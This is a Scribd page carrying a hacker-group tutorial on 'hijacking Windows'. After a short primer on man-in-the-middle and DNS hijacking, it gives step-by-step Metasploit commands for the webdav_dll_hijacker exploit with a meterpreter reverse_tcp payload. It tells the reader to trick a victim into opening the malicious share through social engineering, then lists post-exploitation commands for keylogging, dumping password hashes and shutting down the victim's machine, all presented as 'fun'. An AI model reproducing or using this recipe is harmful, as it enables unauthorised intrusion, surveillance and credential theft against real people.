Scribd Logo
Upload

Welcome to Scribd!

  • Hijacking Windows PDF

    Uploaded by

    jatin
    41 views23 pages

    Original Title

    hijacking windows.pdf

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    41 views23 pages

    Hijacking Windows PDF

    Uploaded by

    jatin

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 23

    Greetz :

    H4x0R 5uD!P ( D1617 64 ), Th3 cr3aT0r ,SsilentIntruder


    ,D-Intruder , ix_WarRior,Cyb3r Inj3ct0r, TOXCIFI3D
    Hax0r, HEARTOFSILICON ,KidD3 H@ck3r,DevIl
    SP33D ,Lon3ly H4cK3r, Phoenix64 ,Bl4cK 34gl3, lequid
    3xploit3r ,N-coder, 73rm!n470r h4cker, 0Ut Sid3r, And All
    Members Of Team InDI hEx

    Indian Cyber Police:AP3X , HACK0 , C0D3 INJ3CT0R ,YASH,CODED32


    AND ALL.

    HUGS TO :AP3X AND H4CK0 , T.O.F ,MCA ,GCA ,ICA ,ICH, AND
    ALL INDIAN HACKING GROUPS

    Author
    Un_N0n Antil0g
    Team Indihex

    (Admin)

    Indian Cyber Police (Core Member)

    [#] ~ Team Indihex ->


    https://www.facebook.com/pages/Indi-HeX/379631892050858?ref=ts

    [#] ~ Indian Cyber police ->


    https://www.facebook.com/indian.cyber.police?ref=ts

    INTRODUCTION
    This Book will Tell you some Basics of
    Hijacking exploits that are present in Back|
    Track.
    Hijacking is one of most interesting way To
    break into some security of website or
    Windows Os.

    [#] ~ What is Hijacking ?


    Hijacking is a type of network security attack in which the
    attacker takes control of a communication - just as an airplane
    hijacker takes control of a flight - between two entities and
    masquerades as one of them. In one type of hijacking (also
    known as a man in the middle attack), the perpetrator takes
    control of an established connection while it is in progress. The
    attacker intercepts messages in a public key exchange and then
    retransmits them, substituting their own public key for the
    requested one, so that the two original parties still appear to be
    communicating with each other directly. The attacker uses a
    program that appears to be the server to the client and appears
    to be the client to the server. This attack may be used simply to
    gain access to the messages, or to enable the attacker to
    modify them before retransmitting them.

    Another form of hijacking is browser hijacking, in which a user is


    taken to a different site than the one the user requested. There
    are two different types of domain name system (DNS) hijacking.
    In one, the attacker gains access to DNS records on a server
    and modifies them so that requests for the genuine Web page
    will be redirected elsewhere - usually to a fake page that the

    attacker has created. This gives the impression to the viewer


    that the Web site has been compromised, when in fact, only a
    server has been. In February 2000, an attacker hijacked RSA
    Security's Web site by gaining access to a DNS server that was
    not controlled by RSA. By modifying DNS records, the attacker
    diverted requests to a spoof Web site. It appeared to users that
    an attacker had gained access to the actual RSA Web site data
    and changed it - a serious problem for a security enterprise.
    This type of hijacking is difficult to prevent, because
    administrators control only their own DNS records, and have no
    control over upstream DNS servers. In the second type of DNS
    hijack, the attacker spoofs valid e-mail accounts and floods the
    inboxes of the technical and administrative contacts.

    [#] ~ Hijacking Windows.


    Now , our real topic starts
    So , i will perform this exploit on Windows xp.
    You can try it on Windows vista , Windows 7 Too.

    I am using Back|Track R2 KDE .


    Target is -> Windows XP machine.

    So Time to start the real Work.

    [#]~ Exploit working .


    The exploit i am using is Webdav_dll_hijacker.
    Location of exploit in back|Track ->
    exploit/windows/browser/webdav_dll_hijacker.

    Well , so whats DLL here , there are certain files in


    Windows that depend upon DLL. When you open
    A file like .txt it opens in notepad , But certain

    Files Required DLL to run , So if theres no DLL


    present with them , then it goes in
    windows/system32 to Get that specified DLL.
    In this case , Metasploit will substitute that DLL
    files , so Exploit could work. So there fore as a
    result
    HIJACKING takes place.
    Normally , windows try to find DLL present in Same
    folder which program your running , but if its not
    there , it will goto system32 Etc.
    So this discussion show kinda nature of this
    EXPLOIT :D !
    We will substitute the DLL which windows wants
    to the DLL which Back|Track sends.
    SO THIS IS HOW THIS EXPLOIT WORKS

    So , what your waiting for ?


    Start Your BACK|TRACK .
    So guys Lets Do it.

    [#] ~ STEPS TO HIJACK.


    So for this attack ,
    1 -> Open Terminal , type in Msfconsole.
    Msfconsole is a part of Metasploit , which is pre
    Installed in back track.

    2 - > when Msfconsole will be Started, Type in


    Use
    exploit/windows/browser/webdav_dll_hijacker

    3-> So Now ,
    Type set payload
    windows/meterpreter/reverse_tcp.
    This will Set your payload

    4 -> Type in Set basename (enter any name here)


    Basename is name given to files , which are used
    for Hijacking.

    5-> Type in
    Set extensions wab txt grp vcf p7c
    Then Press Enter.

    5->

    6-> Type in
    Set LHOST (Your IP here).

    7-> Type in
    Set srvhost (Your IP here).
    Then Press Enter.

    8->Type in
    Set LPORT 7777.
    Then Enter.

    9-> Finally , Everthing is ready.


    Now , Time to Attack.
    Type in Exploit
    Then Press Enter.

    As you can see in Screenshot , Server has started.


    Now , time For Some Soical engg.
    If you Know What i mean :P .

    Now , you can clearly see , when exploit is started ,


    it gives address , where the Infected files are
    available for Attacks.
    for Example :- \\10.10.10.131\documents\
    Now , using some Soical engg. skills , Make Victim

    To open that link in his/her Windows.


    When He/She opens it , some files appear .
    that files contain PAYLOAD , which will start , when
    double clicked on it

    Five files appear , name contact.


    i have used basename = contact.
    so , this files have PAYLOAD in it. When double
    clicked , it starts thus session open in back | track.

    After Double clicking on it

    You can clearly see , meterpreter Session is


    opened.
    Now , its time to have some fun :P

    Now Type in

    Sessions i 1

    Then Press Enter.

    BAAM!! :P
    Now , Type in Help .
    This is will show , commands available .
    so you can execute them.
    Its a great fun using them

    [#] ~ SOME COMMANDS


    1 - ifconfig
    To see Ip config and info
    2- Keyscan_start
    It will start a keylogger , that will moniter all key
    strokes on the targets Machine.
    3- Keyscan_Dump
    It will dump all key strokes captured.

    4- Keyscan_stop
    It will Stop capturing Keystrokes.

    5 - Hashdump

    It will dump All hashes Present in Target Machine.

    6- Shutdown
    It will shutdown Targets machine.

    There Are Many Commands available .


    Try them all.

    HOPE YOU GUYS LIKE THIS PDF AND FIND IT


    HELPFUL

    THANK YOU
    [#] ~Un_N0n Antil0g ~ > LOGGING OUT

    You might also like